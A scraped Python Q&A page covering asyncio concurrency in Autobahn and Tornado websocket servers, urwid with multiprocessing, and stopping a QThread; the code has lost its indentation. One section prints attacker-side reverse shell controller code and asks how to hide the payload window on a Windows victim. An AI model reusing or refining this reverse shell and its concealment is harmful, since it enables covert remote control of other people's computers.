Python Autobahn Websocket Server Receving One connection at a time - websocket

Python Asyncio or Twisted used by Autobahn are supposed to Handle concurrent connection at the same time.
I followed a good tutorial on autobahn read-the-doc, it all worked well, yet the server is receiving only one connection and process it's request and then after that accept a second one.
How can I ensure that the server receives multiple connection cocurrently without holding other connecting peer?
I have searched across the web the whole day but no success
here is my code(I have cut out a lot of code while debugging)
from autobahn.asyncio.websocket import WebSocketServerProtocol
from autobahn.asyncio.websocket import WebSocketServerFactory
class NMmapperServerProtocol(WebSocketServerProtocol):
cmd = NMmapperWSCommandParser() # I have cut out this due to debugging
def onMessage(self, payload, isBinary):
"""
#payload the message
#isBinary whether it's a binary message
"""
try:
offload_payload = json.loads(payload.decode("utf-8"))
await asyncio.gather(cmd.processWSCommands(offload_payload, self))
except Exception as e:
raise
def onConnect(self, request):
"""
When we've got a peer connect to our server
"""
try:
#print(self)
print(request.peer, "Has connected")
except Exception as e:
raise
def onOpen(self):
"""
We have a fully connection
"""
try:
# Some database action can be made from here
print("Connection now opened")
except Exception as e:
raise
def onClose(self, wasClean, code, reason):
"""
# the client is closing his or her
connection
"""
try:
print("wasClean ", wasClean)
print("code ", code)
print("reason ", reason)
except Exception as e:
raise
# Setters
def setCsrftoken(self, cookie_string):
"""
# parse an set
"""
self.csrftoken = self.parse_csrftoken(cookie_string)
# Setters
def setSession(self, cookie_string):
"""
# parse an set
"""
self.session = self.parse_session(cookie_string)
if __name__=="__main__":
if(IN_PRODUCTION):
print("RUNNING ")
factory = NMmapperWSServerFactory(PRODUCTION_HOST, PRODUCTION_PORT)
factory.run_loop()
else:
print("Running on dev")
factory = WebSocketServerFactory()
factory.protocol = NMmapperServerProtocol
loop = asyncio.get_event_loop()
coro = loop.create_server(factory, '0.0.0.0', 9000)
server = loop.run_until_complete(coro)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
finally:
server.close()
loop.close()
Thank you.

I finally got it working as expected. Being an asyncio library
i had to prefix async on each method that performs long running task
The Problem was with the onMessage, I had to process the messages in parallel
not to block the other clients wanting to process there messages also.
so to do that i had to
offload_payload = json.loads(payload.decode("utf-8"))
loop = asyncio.get_event_loop()
# Offload command processing
loop.create_task(self.processWSCommands(offload_payload, self))
This way every message is processed in parallel
Even in such an instance ensure that the method or function processing the message don't block.
from autobahn.asyncio.websocket import WebSocketServerProtocol
from autobahn.asyncio.websocket import WebSocketServerFactory
class NMmapperServerProtocol(WebSocketServerProtocol):
cmd = NMmapperWSCommandParser() # I have cut out this due to debugging
async def onMessage(self, payload, isBinary):
"""
#payload the message
#isBinary whether it's a binary message
"""
try:
offload_payload = json.loads(payload.decode("utf-8"))
loop = asyncio.get_event_loop()
#loop.create_task(runner(10, self.peer))
#asyncio.gather(runner(20, self.peer))
# Offload command processing
loop.create_task(self.processWSCommands(offload_payload, self))
except Exception as e:
raise
def onConnect(self, request):
"""
When we've got a peer connect to our server
"""
try:
#print(self)
print(request.peer, "Has connected")
except Exception as e:
raise
def onOpen(self):
"""
We have a fully connection
"""
try:
# Some database action can be made from here
print("Connection now opened")
except Exception as e:
raise
def onClose(self, wasClean, code, reason):
"""
# the client is closing his or her
connection
"""
try:
print("wasClean ", wasClean)
print("code ", code)
print("reason ", reason)
except Exception as e:
raise
# Setters
def setCsrftoken(self, cookie_string):
"""
# parse an set
"""
self.csrftoken = self.parse_csrftoken(cookie_string)
# Setters
def setSession(self, cookie_string):
"""
# parse an set
"""
self.session = self.parse_session(cookie_string)
if __name__=="__main__":
if(IN_PRODUCTION):
print("RUNNING ")
factory = NMmapperWSServerFactory(PRODUCTION_HOST, PRODUCTION_PORT)
factory.run_loop()
else:
print("Running on dev")
factory = WebSocketServerFactory()
factory.protocol = NMmapperServerProtocol
loop = asyncio.get_event_loop()
coro = loop.create_server(factory, '0.0.0.0', 9000)
server = loop.run_until_complete(coro)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
finally:
server.close()
loop.close()

Related

python asyncio class to create functions dynamically and execute with own interval parallel

I am trying to write a class that create methods dynamically that should executed parallel each with it's own duration with asyncio. But I am really new in the topic python asyncio and now on a point where I got stuck and have no idea how to go.
I collect servers with ip, port and command duration from config file and try to create methods in a loop and then gather these methods with async, here is my code:
import asyncio
from datetime import datetime
# from common.config import ConfigConstructor
class RCONserver:
def __init__(self, game: str, server_name=None):
self.game = game
self.server_name = server_name
# self.game_config = ConfigConstructor('cfg/rcon_server.yml')
async def send_rcon_command(self, ip: str, port: str, period: int, cnt: int):
await asyncio.sleep(int(period))
print(str(datetime.now()) + ": " + ip + " " + port)
def get_servers(self):
servers = []
for server in ['game1','game2']:
print(server)
if server[:4] == "game":
# s = self.game_config
# s.fetch_section(server)
# print(s)
servers.append(
self.send_rcon_command('192.168.178.1',
'30000',
300,
3)
return servers
async def main():
obj = RCONserver('game')
await asyncio.gather(*obj.get_servers())
asyncio.run(main())
The code is running but only one time for each server in the yml File.
What do I have to do to run it periodically for the given parameter watch period?
i think this should do the trick with loop and gather i can create functions dynamically and run each with it's own interval parallel:
import asyncio
from datetime import datetime
import random
class RCONServer:
def __init__(self):
self.rcon_loop = asyncio.get_event_loop()
def dt(self):
return datetime.now().strftime("%Y/%m/%d %H:%M:%S")
def build_rcon_functions(self):
rcon_servers = []
for server in ['game1','game2']:
rcon_servers.append(
self.rcon_command(server,
"192.168.0.1",
"30000",
"some_password",
random.randint(5, 10)
)
)
return rcon_servers
async def rcon_command(self, server: str, ip: str, port: str, passwd: str, interval: int):
while True:
await asyncio.sleep(int(interval))
print(self.dt(), ">", server)
async def run_loop(self):
rcon_tasks = self.build_rcon_functions()
try:
print(self.dt(), "> Start")
await asyncio.gather(*rcon_tasks)
self.rcon_loop.run_forever()
except KeyboardInterrupt:
pass
finally:
print(self.dt(), "> End")
self.rcon_loop.close()
obj = RCONServer()
asyncio.run(obj.run_loop())
Some suggestions for optimizing? or some hints how it can be solved better?

Urwid and Multiprocessing

i try to sequence some actions in urwid
I made a timer which run in background and communicate with the mainprocess
like this:
from multiprocessing import Process, Pipe
import time
import urwid
def show_or_exit(key):
if key in ('q', 'Q'):
raise urwid.ExitMainLoop()
class midiloop(urwid.Frame):
def __init__(self):
self.message = urwid.Text('Press Space', align='center')
self.filler = urwid.Filler(self.message, "middle")
super().__init__(urwid.Frame(self.filler))
def keypress(self, size, key):
if key == " ":
self.seq()
else:
return key
def timer(self,conn):
x = 0
while True:
if (conn.poll() == False):
pass
else:
z = conn.recv()
if (z == "kill"):
return()
conn.send(x)
x+=1
time.sleep(0.05)
def seq(self):
self.parent_conn, self.child_conn = Pipe()
self.p = Process(target=self.timer, args=(self.child_conn,))
self.p.start()
while True:
if (self.parent_conn.poll(None)):
self.y = self.parent_conn.recv()
self.message.set_text(str(self.y))
loop.draw_screen()
if ( self.y > 100 ):
self.parent_conn.send("kill")
self.message.set_text("Press Space")
return()
if __name__ == '__main__':
midiloop = midiloop()
loop = urwid.MainLoop(midiloop, unhandled_input=show_or_exit, handle_mouse=True)
loop.run()
The problem is i'm blocking urwid mainloop with while True:
So anyone can give me a solution to listen for key Q to quit the program before it reachs the end of the loop for example and more generally to interact with urwid and communicate with the subprocess
It seems to be rather complicated to combine multiprocessing and urwid.
Since you're using a timer and your class is called midiloop, I'm going to guess that maybe you want to implement a mini sequencer.
One possible way of implementing that is using an asyncio loop instead of urwid's MainLoop, and schedule events with the loop.call_later() function. I've implemented a simple drum machine with that approach in the past, using urwid for drawing the sequencer, asyncio for scheduling the play events and simpleaudio to play. You can see the code for that here: https://github.com/eliasdorneles/kickit
If you still want to implement communication with multiprocessing, I think your best bet is to use urwid.AsyncioEventLoop and the aiopipe helper for duplex communication.
It's not very minimal I'm afraid. However I did spend a day writing this Urwid frontend that starts, stops and communicates with a subprocess.
import os
import sys
from multiprocessing import Process, Pipe, Event
from collections import deque
import urwid
class suppress_stdout_stderr(object):
"""
Supresses the stdout and stderr by piping them to dev null...
The same place I send bad faith replies to my tweets
"""
def __enter__(self):
self.outnull_file = open(os.devnull, 'w')
self.errnull_file = open(os.devnull, 'w')
self.old_stdout_fileno_undup = sys.stdout.fileno()
self.old_stderr_fileno_undup = sys.stderr.fileno()
self.old_stdout_fileno = os.dup(sys.stdout.fileno())
self.old_stderr_fileno = os.dup(sys.stderr.fileno())
self.old_stdout = sys.stdout
self.old_stderr = sys.stderr
os.dup2(self.outnull_file.fileno(), self.old_stdout_fileno_undup)
os.dup2(self.errnull_file.fileno(), self.old_stderr_fileno_undup)
sys.stdout = self.outnull_file
sys.stderr = self.errnull_file
return self
def __exit__(self, *_):
sys.stdout = self.old_stdout
sys.stderr = self.old_stderr
os.dup2(self.old_stdout_fileno, self.old_stdout_fileno_undup)
os.dup2(self.old_stderr_fileno, self.old_stderr_fileno_undup)
os.close(self.old_stdout_fileno)
os.close(self.old_stderr_fileno)
self.outnull_file.close()
self.errnull_file.close()
def subprocess_main(transmit, stop_process):
with suppress_stdout_stderr():
import time
yup = ['yuuuup', 'yuuuuup', 'yeaup', 'yeoop']
nope = ['noooooooe', 'noooope', 'nope', 'nope']
mesg = 0
i = 0
while True:
i = i % len(yup)
if transmit.poll():
mesg = transmit.recv()
if mesg == 'Yup':
transmit.send(yup[i])
if mesg == 'Nope':
transmit.send(nope[i])
if stop_process.wait(0):
break
i += 1
time.sleep(2)
class SubProcess:
def __init__(self, main):
"""
Handles forking, stopping and communication with a subprocess
:param main: subprocess method to run method signature is
def main(transmit, stop_process):
transmit: is a multiprocess Pipe to send data to parent process
stop_process: is multiprocess Event to set when you want the process to exit
"""
self.main = main
self.recv, self.transmit = None, None
self.stop_process = None
self.proc = None
def fork(self):
"""
Forks and starts the subprocess
"""
self.recv, self.transmit = Pipe(duplex=True)
self.stop_process = Event()
self.proc = Process(target=self.main, args=(self.transmit, self.stop_process))
self.proc.start()
def write_pipe(self, item):
self.recv.send(item)
def read_pipe(self):
"""
Reads data sent by the process into a list and returns it
:return:
"""
item = []
if self.recv is not None:
try:
while self.recv.poll():
item += [self.recv.recv()]
except:
pass
return item
def stop(self):
"""
Sets the event to tell the process to exit.
note: this is co-operative multi-tasking, the process must respect the flag or this won't work!
"""
self.stop_process.set()
self.proc.join()
class UrwidFrontend:
def __init__(self, subprocess_main):
"""
Urwid frontend to control the subprocess and display it's output
"""
self.title = 'Urwid Frontend Demo'
self.choices = 'Start Subprocess|Quit'.split('|')
self.response = None
self.item = deque(maxlen=10)
self.event_loop = urwid.SelectEventLoop()
# start the heartbeat
self.event_loop.alarm(0, self.heartbeat)
self.main = urwid.Padding(self.main_menu(), left=2, right=2)
self.top = urwid.Overlay(self.main, urwid.SolidFill(u'\N{MEDIUM SHADE}'),
align='center', width=('relative', 60),
valign='middle', height=('relative', 60),
min_width=20, min_height=9)
self.loop = urwid.MainLoop(self.top, palette=[('reversed', 'standout', ''), ], event_loop=self.event_loop)
self.subprocess = SubProcess(subprocess_main)
def exit_program(self, button):
raise urwid.ExitMainLoop()
def main_menu(self):
body = [urwid.Text(self.title), urwid.Divider()]
for c in self.choices:
button = urwid.Button(c)
urwid.connect_signal(button, 'click', self.handle_button, c)
body.append(urwid.AttrMap(button, None, focus_map='reversed'))
return urwid.ListBox(urwid.SimpleFocusListWalker(body))
def subproc_menu(self):
self.response = urwid.Text('Waiting ...')
body = [self.response, urwid.Divider()]
choices = ['Yup', 'Nope', 'Stop Subprocess']
for c in choices:
button = urwid.Button(c)
urwid.connect_signal(button, 'click', self.handle_button, c)
body.append(urwid.AttrMap(button, None, focus_map='reversed'))
listbox = urwid.ListBox(urwid.SimpleFocusListWalker(body))
return listbox
def update_subproc_menu(self, text):
self.response.set_text(text)
def handle_button(self, button, choice):
if choice == 'Start Subprocess':
self.main.original_widget = self.subproc_menu()
self.subprocess.fork()
self.item = deque(maxlen=10)
if choice == 'Stop Subprocess':
self.subprocess.stop()
self.main.original_widget = self.main_menu()
if choice == 'Quit':
self.exit_program(button)
if choice == 'Yup':
self.subprocess.write_pipe('Yup')
if choice == 'Nope':
self.subprocess.write_pipe('Nope')
def heartbeat(self):
"""
heartbeat that runs 24 times per second
"""
# read from the process
self.item.append(self.subprocess.read_pipe())
# display it
if self.response is not None:
self.update_subproc_menu(['Subprocess started\n', f'{self.item}\n', ])
self.loop.draw_screen()
# set the next beat
self.event_loop.alarm(1 / 24, self.heartbeat)
def run(self):
self.loop.run()
if __name__ == "__main__":
app = UrwidFrontend(subprocess_main)
app.run()

Hide payload window on target system. Python Reverse Shell

I'm using this simple python reverse shell.
When this runs, a command window pops up on the target Windows system. Is there a way to hide it?
import socket
BUFFER_SIZE = 1024
attacker_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# lets the attacker server listen on the specified port number
def attacker_server_binder(hostname, port_number):
attacker_server.bind((hostname, port_number))
attacker_server.listen(5)
# listening for connections
def target_client_connection_receiver():
while True:
# receive connection from target client
target_client, target_client_address = attacker_server.accept()
if(target_client != None):
break
print("Connection established to target\n $reverse_shell: ", end="")
return target_client
# connects to the client being targeted
def send_data(data, target_client):
target_client.send(bytes(data, 'utf-8'))
acknowledgement = target_client.recv(BUFFER_SIZE)
if(acknowledgement == b'ACK'):
# print("Data received at target end")
receive_data(target_client)
else:
print("Acknowledgement receipt not received.\n$reverse_shell: ", end = "")
def receive_data(target_client):
response = ""
while True:
received_data = target_client.recv(BUFFER_SIZE)
received_data = received_data.decode('utf-8')
response = response + received_data
if(len(received_data) < BUFFER_SIZE):
break
print(response + "\n$reverse_shell: ", end= "")
def command_handler(target_client):
data = str(input())
try:
data.index('file')
file_handler(target_client, data)
return
except:
pass
send_data(data, target_client)
def file_handler(target_client, command):
target_client.send(bytes(command, 'utf-8'))
acknowledgement = target_client.recv(BUFFER_SIZE)
if(acknowledgement == b'ACK'):
pass
data_splits = command.split(' ')
mode = data_splits[2]
if(mode == 'r'):
receive_data(target_client)
elif(mode == 'w' or mode == 'a'):
print("enter FILE_UPDATE_QUIT to end data transfer")
while True:
data = str(input("--> "))
target_client.send(bytes(data, 'utf-8'))
if(data == 'FILE_UPDATE_QUIT'):
break
receive_data(target_client)
def main():
attacker_server_binder("192.168.29.15", 1234)
# receive connection from target client
target_client = target_client_connection_receiver()
while True:
command_handler(target_client)
main()

How to stop QThread "gracefully"?

I have got some help to do the following code. But I need to break out from this loop which is in the Worker thread, so when I exit from the application, it does not crash. At the moment QThread is still running when I quit from the app.
If I use break statement it works, but then I cannot do another search for hosts, because the loop has been closed entirely. I have tried several ways to do it, but no luck. I am new to programming.
class Worker(QThread):
found = Signal(str)
notFound = Signal(str)
def __init__(self):
QThread.__init__(self)
self.queue = Queue()
def run(self):
while True:
hostname = self.queue.get()
output_text = collect_host_status(hostname)
for i in output_text:
if "not found" in i:
self.notFound.emit(i.replace(" not found", ""))
else:
self.found.emit(i)
def lookUp(self, hostname):
self.queue.put(hostname)
class MainWindow(QMainWindow):
def __init__(self):
# ...
self.ui.pushButton_2.clicked.connect(self.buttonclicked)
self.thread = Worker()
self.thread.found.connect(self.ui.textEdit_2.append)
self.thread.notFound.connect(self.ui.textEdit_3.append)
self.thread.start()
def buttonclicked(self):
if self.ui.textEdit.toPlainText():
self.thread.lookUp(self.ui.textEdit.toPlainText())
Here is the code for the collect host status:
def get_brss_host_status(host):
host = host.lower()
api_url = 'https://some.system.with/api/'
host_search = 'status/host/{}?format=json'.format(host)
r = requests.get(api_url + host_search, auth=(loc_brss_user, loc_brss_passwd))
request_output = r.text
if request_output == '{"error":"Not Found","full_error":"Not Found"}':
host2 = host.upper()
host_search2 = 'status/host/{}?format=json'.format(host2)
r2 = requests.get(api_url + host_search2, auth=(loc_brss_user, loc_brss_passwd))
request_output2 = r2.text
# print('Debug request_output2', request_output2)
if request_output and request_output2 == '{"error":"Not Found","full_error":"Not Found"}':
output_string = host + " not found"
else:
output_string = host2
else:
output_string = host
return output_string
def collect_host_status(hosts):
hosts_list = list(hosts.split("\n"))
status_list = []
for i in hosts_list:
host = get_brss_host_status(i)
status_list.append(host)
return status_list
The base solution, as suggested in the comments by #ekhumoro, is to use a simple flag in the while loop, which will ensure that as soon as the cycle restarts it exits if the condition is not respected.
Some care should be used, though, for two important aspects:
using the basic get() of Queue makes the cycle wait undefinitely;
the function in the example (a network request) might be delayed for some time if any network problem occurs (temporary network issues, etc);
To correctly solve these issues, the following modifications should be done:
get() should use a timeout, so that it allows exiting the cycle even when no request is being queued; as an alternative, you can unset the "running" flag, add anything to the queue and check for the flag before proceeding: this ensures that you don't have to wait for the queue get() timeout;
the network requests should have a minimum timeout too;
they should be done individually from the thread, and not grouped, so that the thread can exit if the requested host list is too big and you want to quit while doing look ups;
from queue import Queue, Empty
class Worker(QThread):
found = Signal(str)
notFound = Signal(str)
def __init__(self):
QThread.__init__(self)
self.queue = Queue()
def run(self):
self.keepRunning = True
while self.keepRunning:
hostList = self.queue.get()
if not self.keepRunning:
break
# otherwise:
# try:
# hostList = self.queue.get(timeout=1)
# except Empty:
# continue
for hostname in hostList.splitlines():
if not self.keepRunning:
break
if hostname:
output_text = get_brss_host_status(hostname)
if output_text is None:
continue
if "not found" in output_text:
self.notFound.emit(output_text.replace(" not found", ""))
else:
self.found.emit(output_text)
def stop(self):
self.keepRunning = False
self.queue.put(None)
def lookUp(self, hostname):
self.queue.put(hostname)
And in the get_brss_host_status, change the following:
def get_brss_host_status(host):
host = host.lower()
api_url = 'https://some.system.with/api/'
host_search = 'status/host/{}?format=json'.format(host)
try:
r = requests.get(api_url + host_search,
auth=(loc_brss_user, loc_brss_passwd),
timeout=1)
except Timeout:
return
# ...

infinite loop cannot be connected websocket server

A client connect websocket and calls tail_log method, and new client can't connect
How to solve this problem
def on_message(self, message):
def tail_log(user,ip,port,cmd,log_path,url):
cmd = "/usr/bin/ssh -p {port} {user}#{ipaddr} {command} {logpath}" \
.format(user=user, ipaddr=ip, port=port, command=cmd, logpath=log_path)
f = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
while True:
line = f.stdout.readline().strip()
if line == '':
self.write_message('failed')
break
self.write_message(line)
tail_log(user=SSH_USER,ip=IP_ADDR,cmd=CMD,port=SSH_PORT,log_path=LOG_PATH,url=SOCKET_URL)
Your infinite loop must yield control back to Tornado's event loop, either by executing a yield, await, or by returning from the tail_log function. Since your infinite loop does not yield control to the event loop, the event loop can never process any more events, including new websocket connections.
Try using Tornado's own process module to read from your subprocess's stdout asynchronously. Something like this:
import tornado.ioloop
import tornado.process
import tornado.web
import tornado.websocket
class TailHandler(tornado.websocket.WebSocketHandler):
def open(self):
self.write_message(u"Tailing....")
self.p = tornado.process.Subprocess(
"tail -f log.log",
stdout=tornado.process.Subprocess.STREAM,
stderr=tornado.process.Subprocess.STREAM,
shell=True)
tornado.ioloop.IOLoop.current().add_callback(
lambda: self.tail(self.p.stdout))
tornado.ioloop.IOLoop.current().add_callback(
lambda: self.tail(self.p.stderr))
self.p.set_exit_callback(self.close)
async def tail(self, stream):
try:
while True:
line = await stream.read_until(b'\n')
if line:
self.write_message(line.decode('utf-8'))
else:
# "tail" exited.
return
except tornado.iostream.StreamClosedError:
# Subprocess killed.
pass
finally:
self.close()
def on_close(self):
# Client disconnected, kill the subprocess.
self.p.proc.kill()
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.write("""<html><head><script>
var ws = new WebSocket("ws://localhost:8888/tail");
ws.onmessage = function (evt) {
document.write('<p>' + evt.data + '</p>');
};</script></head></html>""")
def make_app():
return tornado.web.Application([
(r"/", MainHandler),
(r"/tail", TailHandler),
])
app = make_app()
app.listen(8888)
tornado.ioloop.IOLoop.current().start()
If you're not on Python 3.5 yet, substitute #gen.coroutine for "async def", substitute "yield" for "await", and substitute "break" for "return".

Resources